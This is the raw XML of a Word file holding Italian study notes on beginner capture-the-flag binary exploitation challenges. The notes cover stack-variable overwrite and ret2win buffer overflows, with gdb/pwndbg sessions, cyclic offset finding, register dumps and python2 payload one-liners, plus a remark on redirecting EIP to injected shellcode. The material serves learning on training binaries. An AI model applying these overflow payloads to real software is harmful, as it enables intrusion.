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66B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OVFLW SOLUTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604668F8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0835D5AD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https://github.com/Crypto-Cat/CTF/tree/main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145310B0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B3E450" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">NB ----&gt; in tutto il file si intende che </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> venga </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>runnato</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>pwndbg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4AA9A0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="345A53CA" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>02-overwriting_stack_variables_part2:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D3F2F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="167D968A" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="00AF5671" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="00AF5671">
        <w:t xml:space="preserve">$ file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AF5671">
        <w:t>overwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B04E2E7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checksec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>overwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3581AFA8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ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -&gt; per disassemblarlo (o qualsiasi altro r2/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>gef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3C7DB2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">------ scopriamo che il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>buffer_input</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> è di 32 byte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AAF024F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phython2 -c 'print 32 * "A" + "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>deadbeef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F87913" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ovewrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&gt; yes? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAdeadbeef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1549A8B8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------ dal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fatto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che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l'output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restituito</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="45DA5404" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>unhex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> "output" -&gt; in questo caso restituiva "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>daed</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>" (al contrario quindi) si evince che:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D5E7A1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>$ phython2 -c 'print 32 * "A" + "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xef</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xbe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>xde</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">"' &gt; payload    ---&gt; -c per eseguire direttamente dalla stringa, \x indica che i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>sinboli</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> seguenti rappresentano un byte in esadecimale</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202404F3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cat payload --&gt; per </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>verficare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20DEA29D" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>$ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/overwrite &lt; payload -------&gt;&gt;&gt; SOLVED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18112DB1" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66128BCE" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>cheattare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> usando i registri:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708A59FD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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>overwrite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="06AB3E4B" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ info </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>function</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="72816EA0" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">$ break </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>punto_in_cui_avviene_compare_trovato_con_ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6A7DF6D8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run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D73AD15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&gt;&gt; yes? "test" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C3FF0E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x $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ebp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 0xc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F1CA2D0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&gt;&gt; 0x12345678</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189EE087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lastRenderedPageBreak/>
        <w:t>$ set *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>indirizzo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0xdeadbeef</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22186227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c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A341B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&gt;&gt; god job!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172DC3A8" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B7C152" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Scrivendo un file </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>python</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>chiamato  exploit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>, con una semplice esecuzione possiamo tenere traccia di tutte le informazioni scoperte nell'analisi del file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="118056F6" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="7E546BB3" w14:textId="4CE1ED71" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:pStyle w:val="Titolo1"/>
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t>03-return_to_win:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F29212F" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="07B4A32C" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Dopo le classiche funzioni di analisi. ---&gt; come in quella di prima da LSB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>executable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> capiamo che è eseguibile dal </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>Less</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>Significant</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> Bit quindi parte da dx a sx ovvero al contrario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E48D40" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="560BA7EA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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> ret2win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835A9C8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cyclic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> 100 -&gt; crea una sequenza ciclica di 100 caratteri </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>aaaabaaacaaad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>…</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>yaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5DBF151A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run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> (senza debug) per testare fino a dove arriva prima di andare in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>segmentation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> fault</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0699702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&gt;&gt; Name: output_di_cyclic_100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477106C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LEGEND: STACK | HEAP | CODE | DATA | WX | RODATA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DBC03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─────────────</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> REGISTERS / show-flags off / show-compact-regs off ]───────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC29003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AX  0x6f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1BA38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BX  0x61616166 ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>faaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5D1CC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CX  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E24E01F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DX  0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B6CE18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DI  0xf7ffcb80 (_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>rtld_global_ro</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>) ◂— 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B0D3779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SI  0xffffd074 —▸ 0xffffd245 ◂— '/home/gianny/Desktop/buffer_overflow/CTF/pwn/binary_exploitation_101/03-return_to_win/ret2win'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4516051B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BP  0x61616167 ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gaaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CEC93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SP  0xffffcfb0 ◂— 'iaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaa'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="300AAFE8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 EIP  0x61616168 ('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>haaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B183F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───────────────────</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>─[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> DISASM / i386 / set emulate on ]───────────────────────</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ADEEDF" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CB1AD83" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>NB___________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775A65E2" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="62039380" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">Potremmo potenzialmente sovrascrivere gli </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>indirizzi  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E3E6DD7" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>in modo che EIP punti ad ESP dentro il quale abbiamo |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C08B0DC" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>iniettato codice malevolo (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>bad</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> shell code).</w:t>
      </w:r>
      <w:r w:rsidRPr="0070510D">
        <w:tab/>
        <w:t xml:space="preserve">     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7475ED5E" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D">
      <w:r w:rsidRPr="0070510D">
        <w:t>_____________________________________________________|</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B201C51" w14:textId="77777777" w:rsidR="0070510D" w:rsidRPr="0070510D" w:rsidRDefault="0070510D" w:rsidP="0070510D"/>
    <w:p w14:paraId="49EB424A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cyclic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -l </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>haaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -&gt; serve per dirci dopo quante lettere si arriva ad "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>haaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve">" che è l'ultimo punto che finisce nell'EIP (puntatore con il </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>address</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> di cui vogliamo sovrascrivere il contenuto), tutto il resto andrà a finire in ESP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615AFC41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disassemble</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>hacked</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> -&gt; perché come ho notato dallo pseudo-code di </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>ghidra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> è </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0070510D">
        <w:t>li</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:t xml:space="preserve"> che mi interessa arrivare, quindi disassemblo per prendere il primo indirizzo e settare l'indirizzo di ritorno</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8C2E9D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python2 -c 'print 28*"A"+"\x82\x91\x04\x08"' &gt; payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE5378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gdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0070510D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ret2win</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A90A8B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run &lt; payload</w:t>
